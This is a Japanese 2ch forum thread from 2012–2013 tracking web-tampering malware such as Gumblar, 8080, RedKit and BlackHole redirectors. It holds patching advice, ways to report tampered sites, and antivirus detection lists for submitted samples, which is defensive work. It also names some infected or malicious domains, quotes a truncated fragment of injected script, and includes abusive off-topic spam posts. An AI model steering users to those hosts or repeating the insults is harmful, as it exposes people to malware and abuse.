【Gumblar/GENO】Web改竄ウイルス総合11【8080】

1 ：2012/08/14 〜 最終レス ：2013/09/14

改ざんされたWebページを経由して感染するウイルスの情報・対策スレです
感染しているサイト・ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加して混乱するようなら別スレを立てて誘導してください
基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう
＊＊＊ 危険と思われるサイトのアドレスはそのまま貼らないで全ての「.」を「●」に変えてください ＊＊＊
＊＊＊ 感染した場合はクリーンインストールと安全なPCからのFTPパスワードの変更を推奨します ＊＊＊
前スレ
【Gumblar/GENO】Web改竄ウイルス総合10【8080】
http://kohada.2ch.net/test/read.cgi/sec/1279692828/

2 ：

Gumblar(.x)、8080系ウイルス対処法。
行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。
(1）Microsoft Update（Windows Update）を実行しシステムを最新の状態にする
(2）Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する
(1)〜(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。
(1）Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2）「分類」の中の「JavaScript」を選択
(3）「Acrobat JavaScriptを使用」のチェックをクリア
(4）「OK」ボタンを押す

※サイトを運営されている方は、さらに次のことも実施していただきたい。
(1）管理サイトのページのソースに意味不明な文字列が埋め込まれていないか確認する
(2）改ざんされていたり、サイト管理に使うパソコンからウイルスが見つかった場合には、
ウイルスに感染していないパソコンを使用して管理サイトのパスワードを変更する

3 ：

【脆弱性を利用されやすいソフトウェア】
下記については必ずアップデートしてください
使用していないものはアンインストール推奨です
■ Windows XPは可能ならば新しいOSに
■ Windows Update / Microsoft Updateを更新
・XP以下は念のためMicrosoft Updateに変更してアップデートする
■ Adobe Reader(Acrobat,Acrobat Reader)を更新 (使っていないならアンインストール)
ttp://get.adobe.com/jp/reader/
・インストール後本体をアップデート
　ヘルプ → アップデートの有無をチェック
・Acrobat Javascriptをオフにする
　編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す
■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意！)
ttp://get.adobe.com/jp/flashplayer/
ttp://www.adobe.com/jp/shockwave/download/alternates/#fp
・Flash Playerのバージョン確認
ttp://www.adobe.com/jp/software/flash/about/
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
ttp://www.adobe.com/jp/shockwave/download/alternates/#sp
■ Java Runtime Environmentを更新 (Javascriptとは違うので注意)
ttp://www.java.com/ja/
・Javaのバージョン確認
ttp://www.java.com/ja/download/installed.jsp
■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール)
ttp://www.apple.com/jp/quicktime/download/
■ RealPlayerを更新 (使っていないならアンインストール)
ttp://jp.real.com/?mode=basic

4 ：

ブラウザのjavascriptを無効にする(しっかり対策してれば不要だが、念のためjavascriptはOFFを推奨)
※javascriptをオフにすると、その機能を利用した一部のサイトが見られなくなる可能性があります
●InternetExplorer　ツール→インターネットオプション→セキュリティ→
　　レベルのカスタマイズ→スクリプトのとこ全部無効にチェック
　　※ActiveXもOFF
●Opera　ツール→クイック設定→「javascriptを有効にする」のチェックを外す
●safari　編集→設定→「JavaScriptを有効にする」のチェックを外す
●Sleipnir　ツール→Sleipnirのオプション→ビュー（Trident）→
　　デフォルトセキュリティ欄の「JavaScriptの実行を許可する」のチェックを外す
●Lunascape　ツール→設定→セキュリティ→スクリプトの実行を許可のチェック外す
　　※SP3でIE8を使うと重くなる場合、Sleipnir＆IE8Sleipnirエディション
　　　もしくはLunascape5を使うといいようです。
●Firefox　ツール→オプション→コンテンツでJavaScript有効にするをはずす

5 ：

ブラウザ個別のプラグイン・アドオン等の使い方に関しては各ブラウザのスレへ行って下さい。
【改ざんサイトの調査など】
■ チェッカーサイト
・gredでチェック
ttp://www.gred.jp/
・aguse
ttp://www.aguse.net/
・WebGetter
ttp://rd.or.tp/get.php
・Dan's View Source
ttp://www.dan.co.uk/viewsource/
・飛び先のチェック by ぴょん基地の友達
ttp://www.kakiko.com/check/sample.html

6 ：

改竄を確認して通報する場合、サイト管理者への通報とともにJPCERT/CCに届出もお願いします。
■インシデント報告の届出(JPCERT/CC)
https://www.jpcert.or.jp/form/

サイト管理者の連絡先不明の場合はWHOISからサーバー管理者へ通報してください。
以下、代表的なサーバー管理会社
デジロック https://www.value-domain.com/webabuse.php
OCN http://www.ocn.ne.jp/info/rules/abuse/
さくら https://secure.sakura.ad.jp/notify/form/abuse.phtml
ロリポップ https://lolipop.jp/support/inq/
GMOインターネットグループ https://secure.gmo.jp/contact/
インフォシーク (isweb) http://portal.faq.rakuten.co.jp/
DION http://www.auone-net.jp/security/knowledge/navi/index.html
NTTPCコミュニケーションズ http://www.nttpc.ne.jp/
ODN https://www.odn.ne.jp/support/question/input_netabuse.html
xserver (株式会社ベット) http://www.xserver.ne.jp/faq.php
heteml ヘテムル https://secure.heteml.jp/support/inquiry/
ファーストサーバ http://www.firstserver.co.jp/contact/index.html
エキサイト http://www.excite.co.jp/help/support

7 ：

改竄を受けたら
ウイルス・不正アクセス届出状況について（3月分および第1四半期）
http://www.ipa.go.jp/security/txt/2010/04outline.html
（3）ウェブサイト改ざんの被害発生時の対処
ウェブサイトが改ざんされてしまった場合、ウェブサイト管理者は被害者であると同時に、ウェブサイト利用者に対する加害者となってしまう可能性があります。
被害の拡大を防ぐために、次に示すような対応が求められます。
▼まず初めに行うべきこと
まず初めに行うことは、早急にウェブサイトの公開を停止することです。同時に ftp のパスワードの変更も行ってください。
このとき、これまでウェブサイトの管理に利用していたパソコンには、ftp のパスワードを盗聴するウイルスが感染している可能性があるため、別のパソコンから操作することを勧めます。
同時に、別のウェブサイトを立てるなどして、ウェブサイト利用者に対して調査状況の説明や、問い合わせ用窓口を設けるなど、随時情報提供に努めてください。
▼改ざん箇所の洗い出し等の調査
上記の対応を行ったのち、保管しておいたクリーンなファイルとウェブサーバ上のファイルの比較などの方法で、全ての改ざん箇所の洗い出しを行ってください。
また、同じパソコンで管理しているウェブサイトが複数ある場合、他のウェブサイトにも改ざんが及んでいる可能性があるため、必ず全てのウェブサイトのファイルを確認してください。
また、改ざん期間等を把握するため、改ざん箇所ごとに ftp のアクセスログの確認などを行なって、被害状況等の調査を行ってください。
▼ウェブサイトを再公開する場合
上記の対応で全ての改ざん箇所の修正を行った上で、ウェブサイトの公開を再開する場合、必ずウェブサイト利用者への改ざんの事実の告知も掲載してください。
ウェブサイト再開の際には、判明した範囲で、次に示す情報を告知することを勧めます。
改ざんの事実の説明
・ 改ざんされていた箇所
・ 改ざんされていた期間
・ ウェブサイト利用者が改ざんされていた箇所を閲覧した場合に想定される被害（ウイルス感染など）の説明
・ ウイルスのチェック方法の説明（必要に応じてオンラインスキャンサイトの紹介など）
・ 問い合わせ用窓口の連絡先
IPAに不正アクセスの届出
http://www.ipa.go.jp/security/ciadr/index.html

8 ：

■ 専ブラで右クリからの検索を有効にする方法。
設定例：JaneView
設定＞基本＞機能＞コマンド欄で
コマンド名　任意の名前
実行するコマンドに　任意のURL
を記載して追加。終わったら「よろし」をクリック。
これで設定完了。
http://www.geocities.jp/nanasi_san_exe/online_help/option/function/command.html
これで専ブラから検索でチェックできるようになります。
以下がそのコマンドの一例になります。
aguse.net サイト情報検索=http://www.aguse.net/result1.php?url=$LINK
飛び先のチェック=http://www.kakiko.com/check/?$LINK
WebGetterでソースを見る=http://rd.or.tp/get.php?site=$LINK&act=view
WebGetterでタグを除去してソースを見る=http://rd.or.tp/get.php?site=$LINK&act=strip
WebGetterでリンクを抽出する=http://rd.or.tp/get.php?site=$LINK&act=link
Dan's View Sourcelでソースを見る=http://www.dan.co.uk/viewsource/index.php?url=$LINK
Dr.WEB=http://online.drweb.com/result?url=$TEXT$LINK

9 ：

>>8
WebGetterのドメインが変更になったもよう。
rd.or.tp → rd.or.tl

10 ：

.

11 ：

そ・う・か
氏・ね
そ・う・か
氏・ね　
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね　
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね　
そ・う・か
氏・ね
そ・う・か
氏・ね

12 ：

天麩羅以外殆どレスがついてないな。平穏で何より。

13 ：

さらみ復帰かきこ

14 ：

「Adobe Reader」の「サンドボックス」を回避する脆弱性はなぜ危険か（トレンドマイクロ）
scan.netsecurity.ne.jp/article/2012/11/28/30520.html
＞このエクスプロイトは、JavaScriptがソフトウェア上で無効になっている場合でも実行される。
＞ユーザが必要とされる唯一のやりとりは、PDFファイルを開き、Webブラウザを閉じるだけで、
＞それだけで脆弱性が悪用される。

15 ：

「ITSOKNOPROBLEMBRO」
It's OK no problem bro.
「bro」って、なんじゃろ？

16 ：

JPドメイン　Web改竄速報
tp://izumino.jp/Security/def_jp.html

17 ：

いろんなCMSがあるのね
ぱっと見、Joomla! 1.5が多いなん
「Joomla!」ってのはLTSが2.5で、まいなうｐだてJoomla! 2.5.8になってるね
トップページにMETA HTTP-EQUIV="Refresh"〜仕込まれてるとこがあるる
こりは故意にやってるのかどーかわかんね
どーすべさ

18 ：

＞＜ ；
> このメールにはご注意ください。送信者のアカウントが不正に使用されている可能性があるため、このメールは個人情報を騙し取ろうとする詐欺である可能性があります。
ぁぅぁぅぁー
検体8080を送ったら、ベンダーからの返信がみーんなこーなってた…
って、ことは改竄サイトのホスティングにはつーほーめる届いてないかもん

19 ：

[Google セーフ ブラウジング診断ページ: microad.jp]
http://www.google.com/safebrowsing/diagnostic?site=microad.jp/
microad.jp は、過去 90 日間に 21 個のサイト（www34.atwiki.jp/no1mixisagi/, www16.atwiki.jp/godeaterburst-wiki/, soccer-douga.com/ など）への感染媒体となっていた形跡があります。

20 ：

RedKit Redirector Injected into Legitimate JavaScript Code | Xanda's Blog !~!
http://blog.xanda.org/2013/02/15/redkit-redirector-injected-into-legitimate-javascript-code/
マルウエア被害の実例と対策について || Joomla日本語コラム
http://www.joomla.jpn.com/joomla/column/joomlacolumn/1083-vol189.html
マカフィー株式会社 |　McAfee Blog - 最新のエクスプロイトキット、Red Kit
http://www.mcafee.com/japan/security/mcafee_labs/blog/content.asp?id=1351
CMS以外のサイトもパパンがパンデミック
こうしてる合間にもまかひはEXTRA.DATを生産中
ひげおじさんもあびらもまいくろそふともがむばってます

21 ：

RedKitリダイレクターけっこう多いよね (´ω｀)
RedKit設置されてるサーバー
ぜんぶ正規のサイトだもんだからイヤラシイことこの上ない

22 ：

ESET参戦
> Dear ○○,
>
> Thank you for your submission.
> The detection for this threat will be included in our next signature update.
>
> *********_ahhd.htm_i.txt - JS/Exploit.Agent.NEN trojan
> *********_987.pdf.txt - JS/Exploit.Pdfka.QED trojan
> *********_987.pdf.txt - JS/Exploit.Pdfka.QED trojan
>
> Regards,
>
> ESET Malware Response Team

>>21
もうね、どーしよーもにゃー
検体送付とつーほーがワンセット サンセット イーセット
(-Д-) ｻﾑｲﾈｪ

23 ：

>>20
> Hello,
>
> The files sent to us could be allocated to the following malware families:
>
> - EXP/Pidief.dtd
> - JS/Dldr.Agent.ahi
>
> The detections and repair routines of the malware samples will be available prospective with one of next update of the VDF.
>
> Best regards,
> Avira Sdn Bhd
うほ

24 ：

>>20のマカフィーが説明しているRedKitの中間Scriptが単純化したのを確認すた。。。しかも相対パスだぼ
現状、呼び出されるjar(exe)で検出されるのを待つしかにゃー
jar(exe)の進捗状況
Detection ratio: 6 / 45
Analysis date: 2013-03-14 12:13:28 UTC
↓
Detection ratio: 11 / 45
Analysis date: 2013-03-14 18:21:34 UTC
Analysis
Antivirus Result Update
DrWeb Trojan.DownLoader8.5817 20130314
Emsisoft Trojan.Win32.Agent.AMN (A) 20130314
Fortinet W32/Yakes.B!tr 20130314
Ikarus Trojan-Downloader.Win32.Karagany 20130314
Kaspersky UDS:DangerousObject.Multi.Generic 20130314
Malwarebytes Trojan.Agent.BVGen 20130314
McAfee PWS-FAQO!C7C63B63204E 20130314
Panda Suspicious file 20130314
TheHacker Posible_Worm32 20130314
TrendMicro PAK_Generic.001 20130314
TrendMicro-HouseCall TROJ_GEN.RC1H1CE 20130314
検出できないかもしれない中間Scriptとjar(exe)をメルで送れるベンダーに検体提出しました。

25 ：

国内Webサーバの大規模改ざん発生中。アクセスすると別サイトから自動的にマルウェアダウンロード
http://engawa.2ch.net/test/read.cgi/poverty/1363534745/

26 ：

国内Webサーバの大規模改ざん発生age

27 ：

【社会】環境省サイトが改ざんされる…閲覧者がウイルス感染する危険も
uni.2ch.net/test/read.cgi/newsplus/1363506806/
環境省に聞いてみました
改ざんされてると分かったのはなぜ？
ゼロデイ・ジャパン(0day.jp) | セキュリティ＆マルウェア研究所
0day.jp/
↑
ここで告知されていたからとのこと

28 ：

924 ：名無しさん＠お腹いっぱい。：2013/03/18(月) 16:11:10.81
環境省サイト改ざんウイルス
https://www.virustotal.com/ja/file/a22fdaff19722f4a4d92df3f0057761cf6834a36eb54862938b77ce6ee4539bc/analysis/1363349552/
https://www.virustotal.com/ja/file/a1bf517e91726f5e5dd57640b35e7bd4fc203ad843bbc7cdc472004a8d644933/analysis/1363559122/

29 ：

■NSX GT-ONE GT-ROM.NET
www●gt-rom●net/
>このサイトはコンピュータに損害を与える可能性があります。

30 ：

>>24
EXEのダウンロードパスが固定数値からランダム数値に切り替わってるね
xxxx.htm
yyy.jar
??.html ← EXEが入手できん！ (´ω｀)
>>29
改竄されてて
最終的にCridexというマルウェアの感染となーる

31 ：

ぅほっ
一日見ない間になんかすごいことに
>>25-28
リストが多くて挫折したのさ。。。orz....
>>29
ｱｯｰ
>>30
やっぱランダムだたのね
>24以後、DLできなくなたー
決め打ちもできんくなたー

32 ：

感染サイト一覧
unixfreaxjp.blogspot.jp/2013/03/ocjp-098-285blackhole-exploit-kit.html

つまり、周知キャンペーンw

33 ：

＜愛国者とネトウヨの11の違い＞
理路整然と意見を話すのが愛国者　　　　　　　　　　　　　出所不明な怪文書を貼るのがネトウヨ
　
有識で周りの評価が高いのが愛国者　　　　　　　　　　　　無職でプライドだけ高いのがネトウヨ
日本人である事を誇りに思うのが愛国者　　　　　　　　　　日本人である事だけが誇りなのがネトウヨ
討論で相手の愛国度をはかるのが愛国者　　　　　　　　　討論で相手を売国奴扱いするのがネトウヨ
君が代をきちんと歌えるのが愛国者　　　　　　　　　　　　　気味が悪いほどネットで吠えるのがネトウヨ
家族思いなのが愛国者　　　　　　　　　　　　　　　　　　　　　家族の重荷になっているのがネトウヨ
社会に出て一人前なのが愛国者　　　　　　　　　　　　　　　２ちゃんねるでだけ一人前なのがネトウヨ
　　
日本の歴史と政治に学が深いのが愛国者　　　　　　　　　　２ちゃんの書き込みとレスが不快なのがネトウヨ
日本人が逮捕されると残念だと嘆くのが愛国者　　　　　　　日本人が逮捕されると通名だとわめくのがネトウヨ
日本の事を敬虔（けいけん）に思っているのが愛国者　　　自分の事を聖戦士だと思っているのがネトウヨ
投票で清き一票を入れるのが愛国者　　　　　　　　　　　　　妄想でキモい文章を作るのがネトウヨ

34 ：

私は
一庶民
カスミソウの様に
密やかに

35 ：

>29 VTで検出されるよーになたー
難読化されたScript
BitDefender JS:Trojan.Crypt.MF
F-Secure JS:Trojan.Crypt.MF
GData JS:Trojan.Crypt.MF
Ikarus Exploit.JS.Blacole
MicroWorld-eScan JS:Trojan.Crypt.MF
nProtect JS:Trojan.Crypt.MF
呼び先のphp
Microsoft Exploit:JS/Blacole.GB
Sophos Mal/ExpJS-N
こっからさきはRんかった
ESETとひげおぢさんからめる
ESET
JS/Kryptik.AII trojan
JS/Kryptik.AIK trojan
JS/Exploit.Agent.NEO trojan
ひげおぢさん
Trojan-Downloader.JS.DarDuk.lb

CsideNet様から受領のお返事来てました。
VTとかが反応してきたので対応されるかと思ふぽ
頻繁に更新してるようですが
ドメインがSPAM扱いされてるようになったみたいで、検体メルで送り辛い ＞＜；

36 ：

あげ

37 ：

あびらからもきてた>35
JS/Expy.B〜F

38 ：

>>35
乙でし。
>Last-Modified: Tue, 19 Mar 2013 12:42:23 GMT
>Last-Modified: Tue, 19 Mar 2013 13:27:15 GMT
凄い勢いで更新？
※電話がボボンで代行依頼 orz ありがとう代行さん...

39 ：

>>38
お疲れ様です
4種類ぐらいのScriptが繰り返し交互に変わっているようです
happy-lemon、apmsolucionesweb、speciaalaangepast、vedelaar
んでそれぞれさらに違うとこへ誘導
ipodのとこには古い8080が（ｒｙ

40 ：

ぼぼん解除てすｔ

41 ：

>>24のRedKitの中間Scriptが難読化した
現状まかひのみ対応
File type: HTML
Detection ratio: 2 / 46
McAfee Exploit-Rekit.f 20130402
McAfee-GW-Edition Exploit-Rekit.f 20130402

42 ：

Exploit Kit が設置されてたはずのサイトへ逝ってみた
トップページには
> Hacked By CompLeXx* & XIX
( ﾟ∀ﾟ)ｱﾊﾊ八八ﾉヽﾉヽﾉヽﾉ ＼ / ＼/ ＼

43 ：

Trojan-Downloader.Win32.Karagany
新KwバルスECM:
90 34 00 00 21 00 17 02 0d ee 0c 56 5d 8a 9a 88 20 3c 69 26 e0 70 c0 dc 5c 04 15 de c8 a2 9f 0d be 5a 1b d8 e1 98 00
timeta70bledeva.ｒｒ．nu
https://www.virustotal.com/ja/url/ad520632542fa49f1a301af12c75b47925bedccc5f7964872dfbdc4b7938a52c/analysis/1364931178/
Mal/HTMLGen-A
n8vlzd5e9h.diipl.ｃｏｍ
https://www.virustotal.com/ja/url/ed70555e53241290b281985d0988ca0f8e8f898ee5d465f817ae966d0c124752/analysis/1364931361/
Mal/HTMLGen-A
https://www.virustotal.com/ja/url/a03758a568622c159348ce323beb9085367ed71afde257162b10a40528cb7007/analysis/1364931554/
ESET Malware site
Google Safebrowsing Malware site

44 ：

Google セーフ ブラウジング
このサイトは危険にさらされている可能性があります
http://www.stopforumspam.ｃom/ipcheck/
http://support.google.com/websearch/answer/190597?hl=ja

45 ：

BlackHole Exploit Kit Redirectorだと思うけど
ランダムにExploit Kitサイトや金融系っぽいサイトに飛ばされるので新手のフィッシングかと思ってたら
自分でも知ってるbloombergにも逝っちゃた
どうやらノーマルなサイトと混ぜて飛ばされるみたい
金融系の末尾あたりに付く「LBTG」ってなんじゃろか？
株価チャートのことかなん

46 ：

>>45の亜種
ひげおぢさんから自動お返事の件名「[!!Spam KSE]Re: 〜」
途中誘導されてるとこの一つのアドレスが薬物(Viagra等)販売サイトなのでこーなった…
他のベンダーに届いているのか心配
>>45との共通点
：ﾀｸﾞの文字列
：難読Script　デコードめんどいからaguse最高(´∇｀)　gredでも確認でけるYO
：誘導先に金融系サイトが混ざっている模様。恐らく検出逃れかと

47 ：

>>45
BitDefender Trojan.JS.Iframe.DDE 20130415
Emsisoft Trojan.JS.Iframe.DDE (B) 20130415
F-Secure Trojan.JS.Iframe.DDE 20130415
GData Trojan.JS.Iframe.DDE 20130415

48 ：

>>45
別件だけど関連
http://kohada.2ch.net/test/read.cgi/sec/1160377080/822

49 ：

>>47
Antivirus Result Update
BitDefender Trojan.JS.Iframe.DDE 20130415
DrWeb JS.IFrame.418 20130415
Emsisoft Trojan.JS.Iframe.DDE (B) 20130415
F-Secure Trojan.JS.Iframe.DDE 20130415
GData Trojan.JS.Iframe.DDE 20130415
Ikarus Trojan.JS.IFrame 20130415
Microsoft Trojan:JS/BlacoleRef.DD 20130415
MicroWorld-eScan Trojan.JS.Iframe.DDE 20130415
nProtect Trojan.JS.Iframe.DDE 20130415
TrendMicro-HouseCall TROJ_GEN.F47V0415 20130415

これくらい検出されれば、改竄されたことに気付くかなん

50 ：

>>46
BitDefender Trojan.Script.CDK 20130416
Commtouch JS/IFrame.RS 20130416
DrWeb JS.IFrame.418 20130416
Emsisoft Trojan.Script.CDK (B) 20130416
F-Prot JS/IFrame.RS 20130416
F-Secure Trojan.Script.CDK 20130416
GData Trojan.Script.CDK 20130416
Microsoft Trojan:JS/BlacoleRef.CZ 20130416
MicroWorld-eScan Trojan.Script.CDK 20130416
nProtect Trojan.Script.CDK 20130416
Sophos Mal/Iframe-AO 20130416
TrendMicro-HouseCall TROJ_GEN.F47V0414 20130416

51 ：

>>49
Avira
JS/Iframe.CI
HTML/Iframe.CN
JS/Iframe.CL

52 ：

>>45
また変わった
パパンがパンデミック
DrWeb JS.IFrame.418 20130416
Microsoft Trojan:JS/BlacoleRef.DD 20130416
Norman Blacole.TB 20130416

中間Script
McAfee Exploit-Rekit.f 20130416
Norman RedKit.B 20130416
Microsoft Trojan:JS/BlacoleRef.DD 20130416
Norman Blacole.TB 20130416

BlackHoleもRedKitも同じ中間Scriptになったのかな？ ＞ Norman

53 ：

>>52増えた
BitDefender Trojan.JS.Agent.IYS 20130417
Commtouch JS/IFrame.RS.gen 20130417
DrWeb JS.IFrame.418 20130417
Emsisoft Trojan.JS.Agent.IYS (B) 20130417
F-Prot JS/IFrame.RS.gen 20130417
F-Secure Trojan.JS.Agent.IYS 20130417
GData Trojan.JS.Agent.IYS 20130417
Ikarus Trojan.JS.BlacoleRef 20130417
McAfee JS/Blacole-Redirect.aa 20130417
Microsoft Trojan:JS/BlacoleRef.DD 20130417
MicroWorld-eScan Trojan.JS.Agent.IYS 20130417
Norman Blacole.TB 20130417
nProtect Trojan.JS.Agent.IYS 20130417
TrendMicro-HouseCall TROJ_GEN.F47V0416 20130417
確認できてから三度改竄されてるけど
どんなセキュリティソフト使ってんだろ？
Fxやちょろめ、ぐぐるを使わないんだろか？
孫やほーだと警告でにゃーし
とっくの昔に直接めるしてるし
NTTPCコミュニケーションズからも通達されてるはずなんだけど。。。
ドメインがスパムとかに登録されちゃってるのかな？
Wab上での機会損失関係ない企業なぬか？
ついったーやってるっぽいんだけどにゃー
ひょっとして蜜壷？

54 ：

>>53
四度目
AntiVir JS/BlacoleRef.CZ.7 20130418
Commtouch JS/IFrame.RS.gen 20130418
DrWeb JS.IFrame.418 20130418
F-Prot JS/IFrame.RS.gen 20130418
Ikarus Trojan.JS.IFrame 20130418
McAfee JS/Blacole-Redirect.aa 20130418
Microsoft Trojan:JS/BlacoleRef.DD 20130418
Norman Blacole.TB 20130417
つーほーめる届いてなくても
いーかげん気付かないかなん

55 ：

>>54
五度目
AntiVir JS/BlacoleRef.CZ.7 20130419
BitDefender Trojan.Script.CDS 20130419
Commtouch JS/IFrame.RS.gen 20130419
DrWeb JS.IFrame.418 20130419
Emsisoft Trojan.Script.CDS (B) 20130419
F-Prot JS/IFrame.RS.gen 20130418
F-Secure Trojan.Script.CDS 20130419
GData Trojan.Script.CDS 20130419
Ikarus Trojan.JS.IFrame 20130419
McAfee JS/Blacole-Redirect.aa 20130419
McAfee-GW-Edition JS/Blacole-Redirect.aa 20130419
Microsoft Trojan:JS/BlacoleRef.DD 20130419
MicroWorld-eScan Trojan.Script.CDS 20130419
Norman Blacole.TB 20130419
nProtect Trojan.Script.CDS 20130419
もうﾍﾞﾝﾀﾞｰに送る気力がにゃい

56 ：

こりもころころ変わるっぽい＞中間Script
Sophos Troj/ExpJS-II 20130419
55ひっくるめて送った＞ﾍﾞﾝﾀﾞｰ

57 ：

>>55
七度目
Detection ratio: 2 / 46
Analysis date: 2013-04-21 16:31:34 UTC
Antivirus Result Update
McAfee JS/Exploit-Blacole.ht 20130421
Norman Blacole.TH 20130421
六度目は>>47>>49とおなじものですた

58 ：

中間Script >>57
久しぶりにひげおじさん登場
Detection ratio: 18 / 46
Analysis date: 2013-04-21 17:25:00 UTC
Antivirus Result Update
AntiVir JS/BlacoleRef.CZ.7 20130421
BitDefender Trojan.JS.Agent.IYT 20130421
Commtouch JS/IFrame.RS.gen 20130420
Comodo UnclassifiedMalware 20130421
DrWeb JS.IFrame.418 20130421
Emsisoft Trojan.JS.Agent.IYT (B) 20130421
F-Prot JS/IFrame.RS.gen 20130420
F-Secure Trojan.JS.Agent.IYT 20130421
Fortinet JS/Agent.GWA!tr.dldr 20130421
GData Trojan.JS.Agent.IYT 20130421
Ikarus Trojan.JS.IFrame 20130421
Kaspersky Trojan-Downloader.JS.Agent.gwa 20130421
McAfee JS/Exploit-Blacole.eu 20130421
McAfee-GW-Edition JS/Exploit-Blacole.eu 20130421
Microsoft Trojan:JS/BlacoleRef.DD 20130421
Norman Blacole.TB 20130421
nProtect Trojan.JS.Agent.IYT 20130421
TrendMicro-HouseCall TROJ_GEN.F47V0420 20130421
単純化しちゃったのがまた出た
Detection ratio: 0 / 46
Analysis date: 2013-04-21 17:15:56 UTC

ねもい

59 ：

( ﾟ∀ﾟ)ｱﾊﾊ八八ﾉヽﾉヽﾉヽﾉ ＼ / ＼/ ＼
スパムとかのドメインがあったもより
まかひには送れない

60 ：

>>57
八回目…
Detection ratio: 6 / 46
Analysis date: 2013-04-23 04:15:16 UTC
Antivirus Result Update
AntiVir JS/BlacoleRef.CZ.8 20130423
DrWeb Exploit.BlackHole.182 20130423
McAfee JS/Exploit-Blacole.ht 20130423
NANO-Antivirus Trojan.Script.IFrame.bohxwi 20130423
Norman Blacole.TH 20130422
VIPRE Trojan.JS.Obfuscator.aa (v) 20130423

61 ：

> Dear *****,
>
> Thank you for your submission.
> The detection for this threat will be included in our next signature update.
>
> Regards,
>
> ESET Malware Response Team
いつもごめんよぉー
肝心の大ボス捕まえられなくて

62 ：

これまで蜜壷状態だったとこが正常になった模様です。
お疲れ様でした。
定点観測おはり

63 ：

こんな夜中にGMOの中の人が受理してくれました＞インシデント
ゴールデンなウィークですがお疲れ様です。
ありがとうございます。
この場を借りてお礼申し上げます。

64 ：

一回目
AntiVir JS/BlacoleRef.CZ.12 20130503
Avast JS:Decode-ADH [Trj] 20130504
GData JS:Decode-ADH 20130504
McAfee JS/Exploit-Blacole.ht 20130504
McAfee-GW-Edition JS/Exploit-Blacole.ht 20130504
二回目
AntiVir JS/BlacoleRef.CZ.12 20130504
Avast JS:Decode-ADH [Trj] 20130504
BitDefender Trojan.JS.Iframe.DDQ 20130504
Emsisoft Trojan.JS.Iframe.DDQ (B) 20130504
F-Secure Trojan.JS.Iframe.DDQ 20130504
GData Trojan.JS.Iframe.DDQ 20130504
McAfee JS/Exploit-Blacole.ht 20130504
McAfee-GW-Edition JS/Exploit-Blacole.ht 20130504
MicroWorld-eScan Trojan.JS.Iframe.DDQ 20130504
nProtect Trojan.JS.Iframe.DDQ 20130504
三回目
McAfee JS/Exploit-Blacole.ht 20130505
McAfee-GW-Edition JS/Exploit-Blacole.ht 20130504
Script更新して殆どのベンダー半日もたんかった
てーてんかんそくなぬか
サイトの対応は早くても明後日、火曜日以降になるんだろーな

65 ：

>>64
> 三回目
増えた
BitDefender Trojan.JS.Iframe.DDT 20130505
Comodo UnclassifiedMalware 20130505
Emsisoft Trojan.JS.Iframe.DDT (B) 20130505
F-Secure Trojan.JS.Iframe.DDT 20130505
GData Trojan.JS.Iframe.DDT 20130505
McAfee JS/Exploit-Blacole.ht 20130505
McAfee-GW-Edition JS/Exploit-Blacole.ht 20130505
MicroWorld-eScan Trojan.JS.Iframe.DDT 20130505
nProtect Trojan.JS.Iframe.DDT 20130505
TrendMicro-HouseCall TROJ_GEN.F47V0504 20130505

66 ：

覚音山　西徳寺
www●saitoku●net/
iframe name=Twitter scrolling=auto･･･
競馬の予想屋
keibaky●com
<!--c3284d--><script>try{1-prototype;}catch･･･

two2readblog●com
>不正なソフトウェアには 550 trojan(s) など
ｗｗｗｗｗｗｗｗ

67 ：

上二つGMO、ばりゅどめにつーほー

68 ：

別件ばぅぁー
ひげおぢさん
> Hello,
>
> New malicious software was found in the attached file. Its detection will be included in the next update.
>
> All these 4 files will be detected as Trojan-Downloader.JS.Iframe.ddg
>
> Thank you for your help.

>>64-65
なおた ヽ(´ー｀)ノ

69 ：

RedKit Exploit Kit Redirector Site 某所のJSファイル
AntiVir 　 HTML/TwitScroll.B 　 20130508
Avast 　 JS:Iframe-AML [Trj] 　 20130508
AVG 　 HTML/Framer 　 20130508
BitDefender 　 Trojan.Iframe.CBN 　 20130508
Commtouch 　 IFrame.gen 　 20130508
Comodo 　 TrojWare.JS.Iframe.FK 　 20130508
Emsisoft 　 Trojan.Iframe.CBN (B) 　 20130508
ESET-NOD32 　 JS/Iframe.HH 　 20130508
F-Prot 　 IFrame.gen 　 20130508
F-Secure 　 Trojan.Iframe.CBN 　 20130508
Fortinet 　 JS/Iframe.HH!tr 　 20130508
GData 　 Trojan.Iframe.CBN 　 20130508
Ikarus 　 Exploit.HTML.IframeRef 　 20130508
Kaspersky 　 HEUR:Trojan.Script.Generic 　 20130508
McAfee 　 JS/IFrame.gen.j 　 20130508
McAfee-GW-Edition 　 JS/IFrame.gen.j 　 20130508
Microsoft 　 Exploit:HTML/IframeRef.DM 　 20130508
MicroWorld-eScan 　 Trojan.Iframe.CBN 　 20130508
NANO-Antivirus 　 Trojan.Html.TwitScroll.bklyhq 　 20130508
Norman 　 Iframe.UW 　 20130508
nProtect 　 Trojan.Iframe.CBN 　 20130508
PCTools 　 Trojan.Webkit 　 20130508
Sophos 　 Troj/Iframe-JG 　 20130508
Symantec 　 Trojan.Webkit!html 　 20130508
VIPRE 　 Malware.JS.Generic (JS) 　 20130508
おしんさん、がむばって

70 ：

改竄サイトをホスティングにつーほーしてるなまかへ
ドメインがブロックされることが多いので、めんどいけどフォームからもつーほーしてね

71 ：
